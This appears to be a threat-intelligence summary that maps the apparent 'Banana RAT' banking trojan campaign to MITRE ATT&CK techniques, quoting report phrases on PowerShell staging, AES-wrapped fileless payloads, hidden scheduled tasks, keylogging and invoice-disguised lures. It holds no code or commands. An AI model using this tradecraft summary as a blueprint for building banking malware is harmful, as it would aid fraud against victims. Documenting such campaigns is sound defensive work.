Inside SHADOW-WATER-063’s Banana RAT: From Build Server to Banking Fraud

MITRE Techniques

• [T1059.001 ] PowerShell – Used to fetch, decrypt, and execute staged payloads in memory (‘the batch file launches an obfuscated PowerShell command’; ‘executes the resulting plaintext via ScriptBlock::Create’).
• [T1055 ] Process Injection – The unpacked banker uses in-memory execution and runtime loading patterns to run code without writing decrypted payloads to disk (‘a fileless pattern that prevents the decrypted banker from ever touching disk’).
• [T1027 ] Obfuscated Files or Information – The campaign uses layered obfuscation, polymorphism, junk-code insertion, and AES wrapping to evade detection (‘applies multiple obfuscation layers and an AES-256-CBC wrapper’; ‘Nine in-house obfuscation layers’).
• [T1105 ] Ingress Tool Transfer – The stager downloads the next-stage payload from attacker-controlled infrastructure (‘downloads payload.php from a second attacker-controlled host’).
• [T1053.005 ] Scheduled Task – The malware creates a hidden scheduled task for persistence (‘registered a hidden scheduled task configured to execute powershell.exe’).
• [T1071.001 ] Web Protocols – The operator uses HTTP endpoints for payload staging and campaign infrastructure (‘A single HTTP GET request from the staging cradle to payload.php’; ‘publicly accessible over HTTP’).
• [T1090 ] Proxy – The larger stager uses BITS and WebClient fallback for reliability through proxies (‘uses Start-BitsTransfer with a WebClient fallback for greater reliability through proxies’).
• [T1113 ] Screen Capture – The malware continuously captures the desktop and streams JPEG frames to the operator (‘Continuously captures the desktop … and streams JPEG frames’).
• [T1056.001 ] Keylogging – It records keystrokes in a buffer for later exfiltration (‘captures all keystrokes into a 2,000-entry ring buffer’).
• [T1056.002 ] GUI Input Capture – The malware monitors and manipulates clipboard data and input for fraud (‘Clipboard monitoring’; ‘Remote input control’; ‘Input blocking’).
• [T1204.002 ] Malicious File – User Execution: Malicious File – The victim is tricked into opening a malicious batch file disguised as an invoice document (‘users are tricked into downloading is disguised as an electronic invoice document’).
• [T1112 ] Modify Registry – Not explicitly mentioned; omitted.
• [T1140 ] Deobfuscate/Decode Files or Information – The stager decrypts an AES-wrapped payload in memory before execution (‘decrypts the AES-wrapped body using the embedded key and IV’).
• [T1543.003 ] Create or Modify System Process: Windows Service – SYSTEM token abuse is used to spawn PowerShell in the interactive desktop (‘duplicates SYSTEM token and spawns PowerShell into the user interactive desktop’).
• [T1074.001 ] Local Data Staging – The payload is written to a benign-looking path under a public directory before execution (‘writes it to a world-writable path under a benign filename’).